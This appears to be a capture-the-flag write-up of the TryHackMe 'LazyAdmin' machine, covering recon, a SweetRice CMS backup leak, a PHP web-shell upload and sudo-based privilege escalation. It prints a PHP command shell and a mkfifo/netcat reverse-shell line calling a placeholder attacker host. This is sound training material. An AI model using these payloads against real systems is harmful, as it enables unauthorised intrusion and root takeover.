SweetRice CMS Exploitation | LazyAdmin TryHackMe
ToxSec | A guide to the TryHackMe machine. Featuring CMS enumeration, database extraction, remote shell upload, and privilege escalation.
0x00 LazyAdmin: The Cost of Neglect
A lazy sysadmin is a goldmine. LazyAdmin proves it: breadcrumbs left behind turn into a straight line to root. This box is an exercise in classic exploitation — misconfigured CMS, exposed backups, poor upload validation, and a trivial Perl-to-root escalation.
If you’re sharpening OSCP instincts, this one delivers.
0x01 Ports Don’t Lie
Nmap Sweep
nmap -sC -sV -oN init-scan 10.10.80.64
Results:
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache 2.4.18
SSH and HTTP. Port 80 gets first look. Default Apache splash — no obvious clues.
0x02 Breadcrumbs in /content
Directory Brute-Force
gobuster dir -u http://10.10.80.64 \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Hit on:
/content/
Behind it: SweetRice CMS: a small, obscure platform with a reputation for weak patching and poor hygiene. Unlike WordPress or Drupal, it doesn’t get constant scrutiny, which means vulns often linger unpatched for years. Admins rarely upgrade it, backups sit in predictable paths, and default modules are left exposed. For hackers, that’s a perfect storm: forgotten software, weak defenses, and high-value leaks like database dumps or credential files just waiting to be pulled.
0x03 SQL Backups: Keys to the Kingdom
Searching Exploits
searchsploit sweetrice
SweetRice 1.5.1 → backup disclosure bug. Checked the common path:
http://10.10.80.64/content/inc/mysql_backup/
Found backup.sql wide open.
Extracting Creds
cat backup.sql | grep password
Hash pulled:
42f749ade7f9e195bf475f37a44cafcb
Cracked with CrackStation → password123.
Sidebar: CMS and Their Vulnerabilities
WordPress: endless plugins, constant upload/XXE/XSS flaws.
Joomla: extensions left to rot.
Drupal: “Drupalgeddon”-class RCEs.
SweetRice and niche CMS: unpatched bugs, thin docs, forgotten installs.
The pattern: CMS = skeletons. Enumerate versions, hunt backups, test uploads, and don’t skip the basics.
0x04 Foothold via CMS
Admin Panel
http://10.10.80.64/content/as/
Login:
manager : password123
Exploit Path
SearchSploit shows Exploit 40700 (Ads module file upload). Dropped a PHP shell:
<?php system($_GET['cmd']); ?>
Listener:
nc -nlvp 31337
Trigger:
http://10.10.80.64/content/attachment/reverse_shell.php
Shell landed as www-data.
0x05 Privilege Escalation
Upgrade Shell
python -c 'import pty; pty.spawn("/bin/bash")'
Sudo Check
sudo -l
Output:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
Writable Payload
Inspect script:
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
Key: /etc/copy.sh was writable.
Injected reverse shell:
echo 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i \
2>&1 | nc <attacker-ip> 5554 > /tmp/f' > /etc/copy.sh
Listener:
nc -nlvp 5554
Trigger escalation:
sudo /usr/bin/perl /home/itguy/backup.pl
Root shell confirmed:
whoami
root
cat /root/root.txt
0x06 Debrief
LazyAdmin walked straight into compromise:
Recon: Nmap flagged SSH/HTTP.
Web enum: Gobuster revealed
/content/→ SweetRice CMS.Exposure: Backup SQL leaked DB creds.
Foothold: Ads module upload gave PHP shell.
Privesc: Writable script tied to Perl sudo call → root.
This wasn’t about advanced exploitation — it was about negligence. Exposed backups, weak creds, and privilege scripts pointing to writable files.
A perfect reminder: poor hygiene is just as exploitable as unpatched CVEs.
0x07 Command Recap
# Recon
nmap -sC -sV -oN init-scan 10.10.80.64
# Web Enum
gobuster dir -u http://10.10.80.64 \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# CMS Exposure
searchsploit sweetrice
curl http://10.10.80.64/content/inc/mysql_backup/backup.sql
# Crack hash via CrackStation
# Login at /content/as/ with manager:password123
# Shell
# Upload PHP shell via Ads module
nc -nlvp 31337
# Priv-Esc
python -c 'import pty; pty.spawn("/bin/bash")'
sudo -l
echo 'reverse shell payload' > /etc/copy.sh
nc -nlvp 5554
sudo /usr/bin/perl /home/itguy/backup.pl